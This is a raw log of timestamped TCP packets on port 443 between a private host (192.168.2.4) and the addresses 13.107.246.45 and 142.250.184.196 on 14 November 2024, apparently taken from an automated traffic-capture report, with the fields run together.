                            Nov 14, 2024 23:38:56.068819046 CET55167443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.068836927 CET4435516713.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.191395044 CET4435516313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.192059040 CET55163443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.192081928 CET4435516313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.192682028 CET55163443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.192687988 CET4435516313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.264461994 CET4435516413.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.264986038 CET55164443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.265031099 CET4435516413.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.269188881 CET55164443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.269198895 CET4435516413.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.319490910 CET4435516313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.319586039 CET4435516313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.319746017 CET55163443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.320014954 CET55163443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.320038080 CET4435516313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.320061922 CET55163443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.320071936 CET4435516313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.325835943 CET55168443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.325881958 CET4435516813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.330581903 CET55168443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.330581903 CET55168443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.330624104 CET4435516813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.368057013 CET55162443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.368079901 CET4435516213.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.415498972 CET4435516413.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.415667057 CET4435516413.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.415832043 CET55164443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.416069984 CET55164443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.416088104 CET4435516413.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.416112900 CET55164443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.416119099 CET4435516413.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.419632912 CET55169443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.419678926 CET4435516913.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.419873953 CET55169443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.419873953 CET55169443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.419914007 CET4435516913.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.698695898 CET4435516613.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.699218988 CET55166443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.699281931 CET4435516613.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.699673891 CET55166443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.699728012 CET4435516613.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.727487087 CET4435516513.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.728259087 CET55165443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.728283882 CET4435516513.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.729201078 CET55165443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.729216099 CET4435516513.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.790821075 CET4435516713.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.791629076 CET55167443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.791629076 CET55167443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.791640043 CET4435516713.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.791655064 CET4435516713.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.830297947 CET4435516613.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.830364943 CET4435516613.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.830596924 CET55166443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.830598116 CET55166443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.830598116 CET55166443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.833106041 CET55170443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.833197117 CET4435517013.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.833463907 CET55170443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.833465099 CET55170443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.833584070 CET4435517013.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.866213083 CET4435516513.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.866363049 CET4435516513.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.866485119 CET55165443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.866485119 CET55165443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.866508961 CET55165443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.866522074 CET4435516513.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.869096994 CET55171443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.869137049 CET4435517113.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.869530916 CET55171443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.869657040 CET55171443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.869673014 CET4435517113.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.919394016 CET4435516713.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.919583082 CET4435516713.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.919653893 CET55167443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.919675112 CET55167443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.919682026 CET4435516713.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.919694901 CET55167443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.919701099 CET4435516713.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.922548056 CET55172443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.922638893 CET4435517213.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:56.922910929 CET55172443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.922910929 CET55172443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:56.923032045 CET4435517213.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.065155029 CET4435516813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.065543890 CET55168443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.065572977 CET4435516813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.066123962 CET55168443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.066131115 CET4435516813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.133702993 CET55166443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.133768082 CET4435516613.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.141894102 CET4435516913.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.142297029 CET55169443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.142316103 CET4435516913.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.142775059 CET55169443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.142781019 CET4435516913.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.196377993 CET4435516813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.196594954 CET4435516813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.196671009 CET55168443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.196754932 CET55168443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.196754932 CET55168443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.196799994 CET4435516813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.196829081 CET4435516813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.199342966 CET55173443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.199387074 CET4435517313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.199525118 CET55173443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.199945927 CET55173443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.199963093 CET4435517313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.294039011 CET4435516913.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.294348955 CET4435516913.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.294400930 CET55169443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.294440031 CET55169443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.294462919 CET4435516913.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.294480085 CET55169443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.294487953 CET4435516913.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.296845913 CET55174443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.296905994 CET4435517413.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.296966076 CET55174443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.297108889 CET55174443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.297125101 CET4435517413.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.567126989 CET4435517013.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.567569017 CET55170443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.567634106 CET4435517013.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.567958117 CET55170443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.567970991 CET4435517013.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.616998911 CET4435517113.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.617496014 CET55171443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.617523909 CET4435517113.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.617880106 CET55171443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.617886066 CET4435517113.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.681988955 CET4435517213.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.682533026 CET55172443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.682620049 CET4435517213.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.682799101 CET55172443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.682812929 CET4435517213.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.698487043 CET4435517013.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.698875904 CET4435517013.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.699012041 CET55170443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.699012995 CET55170443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.699012995 CET55170443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.701256037 CET55175443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.701282978 CET4435517513.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.701338053 CET55175443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.701451063 CET55175443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.701455116 CET4435517513.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.749022007 CET4435517113.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.749149084 CET4435517113.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.749200106 CET55171443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.749272108 CET55171443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.749294043 CET4435517113.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.749308109 CET55171443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.749315023 CET4435517113.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.752098083 CET55176443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.752188921 CET4435517613.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.752295017 CET55176443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.752393961 CET55176443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.752414942 CET4435517613.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.814328909 CET4435517213.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.814472914 CET4435517213.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.814646959 CET55172443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.814646959 CET55172443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.814646959 CET55172443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.817099094 CET55177443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.817183971 CET4435517713.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.817265034 CET55177443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.817461967 CET55177443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.817496061 CET4435517713.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.915096045 CET55170443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.915162086 CET4435517013.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.936579943 CET4435517313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.936906099 CET55173443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.936917067 CET4435517313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:57.937277079 CET55173443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:57.937280893 CET4435517313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.068361044 CET4435517313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.068830013 CET4435517413.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.069292068 CET55174443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.069381952 CET4435517413.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.069391966 CET4435517313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.069447041 CET55173443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.069526911 CET55173443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.069540024 CET4435517313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.069550991 CET55173443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.069555998 CET4435517313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.069565058 CET55174443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.069581032 CET4435517413.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.071758032 CET55178443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.071810961 CET4435517813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.071933031 CET55178443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.072069883 CET55178443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.072093964 CET4435517813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.118204117 CET55172443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.118268013 CET4435517213.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.207444906 CET4435517413.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.207504988 CET4435517413.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.207689047 CET55174443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.207689047 CET55174443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.207734108 CET55174443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.207751036 CET4435517413.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.210242987 CET55179443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.210285902 CET4435517913.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.210359097 CET55179443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.210517883 CET55179443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.210526943 CET4435517913.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.440494061 CET4435517513.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.440912008 CET55175443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.440927029 CET4435517513.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.441385031 CET55175443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.441389084 CET4435517513.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.480549097 CET4435517613.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.480870962 CET55176443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.480959892 CET4435517613.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.481161118 CET55176443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.481175900 CET4435517613.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.565038919 CET4435517713.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.565480947 CET55177443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.565546989 CET4435517713.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.565692902 CET55177443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.565709114 CET4435517713.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.570014954 CET4435517513.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.570063114 CET4435517513.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.570127010 CET55175443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.570229053 CET55175443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.570229053 CET55175443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.570241928 CET4435517513.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.570250034 CET4435517513.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.572400093 CET55180443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.572441101 CET4435518013.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.572505951 CET55180443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.572602987 CET55180443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.572609901 CET4435518013.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.607816935 CET4435517613.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.607932091 CET4435517613.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.608211994 CET55176443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.608211994 CET55176443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.608211994 CET55176443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.609848022 CET55181443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.609922886 CET4435518113.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.610090017 CET55181443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.610199928 CET55181443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.610215902 CET4435518113.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.700722933 CET4435517713.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.701199055 CET4435517713.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.701363087 CET55177443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.701363087 CET55177443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.701363087 CET55177443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.703191996 CET55182443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.703262091 CET4435518213.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.703381062 CET55182443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.703516006 CET55182443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.703531027 CET4435518213.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.823479891 CET4435517813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.823920965 CET55178443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.824006081 CET4435517813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.824423075 CET55178443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.824502945 CET4435517813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.915074110 CET55176443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.915148020 CET4435517613.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.930824041 CET55177443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.930886984 CET4435517713.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.955765963 CET4435517813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.955949068 CET4435517813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.956346035 CET55178443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.956346989 CET55178443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.956346989 CET55178443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.958381891 CET55183443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.958450079 CET4435518313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.958575964 CET55183443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.958688974 CET55183443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.958703995 CET4435518313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.978671074 CET4435517913.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.979110956 CET55179443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.979144096 CET4435517913.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:58.979489088 CET55179443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:58.979516029 CET4435517913.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.118077993 CET4435517913.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.118261099 CET4435517913.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.118387938 CET55179443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.118573904 CET55179443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.118599892 CET4435517913.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.118618011 CET55179443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.118624926 CET4435517913.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.120620012 CET55184443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.120646000 CET4435518413.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.120886087 CET55184443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.121048927 CET55184443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.121056080 CET4435518413.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.181775093 CET55185443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:38:59.181864977 CET44355185142.250.184.196192.168.2.4
                            Nov 14, 2024 23:38:59.181957006 CET55185443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:38:59.182142973 CET55185443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:38:59.182167053 CET44355185142.250.184.196192.168.2.4
                            Nov 14, 2024 23:38:59.258718967 CET55178443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.258786917 CET4435517813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.299249887 CET4435518013.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.299678087 CET55180443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.299722910 CET4435518013.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.300075054 CET55180443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.300088882 CET4435518013.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.333834887 CET4435518113.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.334300995 CET55181443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.334362030 CET4435518113.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.334501028 CET55181443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.334515095 CET4435518113.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.428026915 CET4435518013.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.428167105 CET4435518013.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.428230047 CET55180443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.428299904 CET55180443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.428299904 CET55180443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.428335905 CET4435518013.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.428360939 CET4435518013.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.430629015 CET55186443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.430679083 CET4435518613.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.430814981 CET55186443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.431098938 CET55186443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.431135893 CET4435518613.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.439835072 CET4435518213.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.440352917 CET55182443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.440397024 CET4435518213.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.440701962 CET55182443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.440716028 CET4435518213.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.462462902 CET4435518113.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.462887049 CET4435518113.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.463095903 CET55181443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.464540958 CET55181443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.464591026 CET4435518113.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.464623928 CET55181443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.464641094 CET4435518113.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.466905117 CET55187443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.467003107 CET4435518713.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.467106104 CET55187443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.467195988 CET55187443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.467216015 CET4435518713.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.569658995 CET4435518213.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.569785118 CET4435518213.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.569840908 CET55182443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.569890976 CET55182443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.569905996 CET4435518213.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.569924116 CET55182443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.569931030 CET4435518213.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.571717978 CET55188443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.571757078 CET4435518813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.571923018 CET55188443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.572118998 CET55188443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.572135925 CET4435518813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.704288006 CET4435518313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.704611063 CET55183443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.704627991 CET4435518313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.705004930 CET55183443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.705010891 CET4435518313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.836257935 CET4435518313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.836400986 CET4435518313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.836472034 CET55183443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.836551905 CET55183443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.836553097 CET55183443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.836585999 CET4435518313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.836607933 CET4435518313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.838828087 CET55189443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.838892937 CET4435518913.107.246.45192.168.2.4
